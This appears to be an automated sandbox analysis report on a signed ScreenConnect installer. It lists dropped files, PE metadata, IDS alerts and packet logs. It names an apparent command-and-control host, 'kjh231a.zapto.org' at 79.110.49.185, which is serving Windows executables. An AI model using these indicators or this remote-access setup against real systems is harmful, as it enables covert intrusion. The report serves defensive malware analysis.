                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):87
                                                                                                                                                                                                                                                      Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                      MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                      SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                      SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                      SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                                                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                      C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):3.4557019111652925
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKW0sK83yJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:/sKCxkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                      MD5:947CB7180D1041FE2D3DCDC0DAF21AD6
                                                                                                                                                                                                                                                      SHA1:82512295B5B845F5B30FE9FA784C793CEA1A4812
                                                                                                                                                                                                                                                      SHA-256:D93522FF599679EBB5BB10BAEF423E31BE8FB1437ABE86AF553EA7B93A7EDC8D
                                                                                                                                                                                                                                                      SHA-512:58D4B367A1D80B1A089C54B93318AD91C0FB8A493E3CEE659E21807FA36E57558D285D5FC8F875A298B04F207858512B63817F00ACBD1021562EE349F2AD385D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ........}.&l.'..(.................................................L#... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1590
                                                                                                                                                                                                                                                      Entropy (8bit):5.363907225770245
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                                                                                                      MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                                                                                                      SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                                                                                                      SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                                                                                                      SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

                                                                                                                                                                                                                                                      C:\Windows\System32\user.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.070220378377067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDmO/vXbAa3xT:2dL9hK6E46YPoXVvH
                                                                                                                                                                                                                                                      MD5:ACEA838653B74CFB402FC34FFDE3EEE5
                                                                                                                                                                                                                                                      SHA1:53972E41BBD01D64CF5FF39B18A98931AB73321F
                                                                                                                                                                                                                                                      SHA-256:2F1FFCDA60109D0274AC5D5AE0E655E569D8B6D916280FBDD96DB7C3F482D6C3
                                                                                                                                                                                                                                                      SHA-512:BCA06DBBF78F78EE6FA37A8C26492B6596A878DF4DABFFAFFA7AC07E3EEFECDE9619A033D609198F8C3420F69840DC4329359403A34EC0CA64FF929471AB19C4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a29%3a52</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                      Entropy (8bit):4.42155814397974
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:fSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:qvloTMW+EZMM6DFyV03w
                                                                                                                                                                                                                                                      MD5:EB08CDBE19842F20E530A597EBBEF439
                                                                                                                                                                                                                                                      SHA1:CF0D6767B073927857FDA5699218C3E4922120D7
                                                                                                                                                                                                                                                      SHA-256:B73EC178D1DA61013CD9E056F279803D33D455F03C58E59B6D5EDDC07FBD348D
                                                                                                                                                                                                                                                      SHA-512:44198F8CF2AFD408AFF52F898A052AD6E9D90D3BFE7CB7FE688BE68DE5D43807EC960B5BD723FF5E05E4657A1ED271E53286D4AEDE6D232B3B703A4712BED8EB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...j.'..............................................................................................................................................................................................................................................................................................................................................{<.^........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):6.515414062276353
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:3coxOaV92n.exe
                                                                                                                                                                                                                                                      File size:83'360 bytes
                                                                                                                                                                                                                                                      MD5:8baaa006991b70783ed369d3ca853ca3
                                                                                                                                                                                                                                                      SHA1:c4821ff42774877ea91eb582da7a98cbea853dae
                                                                                                                                                                                                                                                      SHA256:8b6c29b6418b96950df0f4d56e90f1d1b25c08ced164e8a3f83b61601a674c71
                                                                                                                                                                                                                                                      SHA512:fb54cf0a475bf8c156c579ca248b196e7fefd9ab94e707c5a62d97787b41b0cd59b336898e7443d99abcf5ddd4033b1154eeaa5119f1cc222714db6128161fa4
                                                                                                                                                                                                                                                      SSDEEP:1536:+oG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdayPBJYYg73xh:2enkyfPAwiMq0RqRfbayZJYYg7
                                                                                                                                                                                                                                                      TLSH:3B835B53B5D18875E9730E3118B1E9B4593FBE110EA48DAF3398422A0F351D19E3AE7B
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Entrypoint:0x401489
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x6673118D [Wed Jun 19 17:12:45 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                                      Import Hash:37d5c89163970dd3cc69230538a1b72b

                                                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                                                      Signature Valid:true
                                                                                                                                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                      Error Number:0
                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                      • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                      • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                      Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                      Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                      Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                      Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      call 00007FBB0C7F490Ah
                                                                                                                                                                                                                                                      jmp 00007FBB0C7F43BFh
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                                      call dword ptr [0040B048h]
                                                                                                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                      call dword ptr [0040B044h]
                                                                                                                                                                                                                                                      push C0000409h
                                                                                                                                                                                                                                                      call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                      call dword ptr [0040B050h]
                                                                                                                                                                                                                                                      pop ebp
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      sub esp, 00000324h
                                                                                                                                                                                                                                                      push 00000017h
                                                                                                                                                                                                                                                      call dword ptr [0040B054h]
                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                      je 00007FBB0C7F4547h
                                                                                                                                                                                                                                                      push 00000002h
                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                      int 29h
                                                                                                                                                                                                                                                      mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                      mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                      mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                      mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                      mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                      mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                      mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                      mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                      mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                      mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                      mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                      mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                      pushfd
                                                                                                                                                                                                                                                      pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                      mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                      mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                      mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                      mov dword ptr [00411810h], 00010001h

                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2da0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rdata0xb0000x5d580x5e003a86bd3d8ffe94b1ebad64876c0f831cFalse0.4178025265957447Applesoft BASIC program data, first line number 14.842507933211541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                      RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                      KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                      CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

                                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                      2024-10-25T19:29:27.806051+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549722TCP
                                                                                                                                                                                                                                                      2024-10-25T19:29:29.798570+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549723TCP
                                                                                                                                                                                                                                                      2024-10-25T19:29:35.382472+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549732TCP
                                                                                                                                                                                                                                                      2024-10-25T19:29:37.121763+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549735TCP
                                                                                                                                                                                                                                                      2024-10-25T19:29:39.555616+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549753TCP
                                                                                                                                                                                                                                                      2024-10-25T19:29:45.467567+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549780TCP
                                                                                                                                                                                                                                                      2024-10-25T19:29:46.823210+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549791TCP
                                                                                                                                                                                                                                                      2024-10-25T19:29:49.300665+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.549803TCP

                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:16.428567886 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:16.428636074 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:16.428709030 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.077738047 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.077780008 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.918936014 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.919018984 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.926028967 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.926040888 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.926361084 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:17.976355076 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.041384935 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.087332010 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469533920 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469558954 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469566107 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469573975 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469613075 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469695091 CEST49705443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469722986 CEST4434970579.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:18.469738007 CEST49705443192.168.2.579.110.49.185
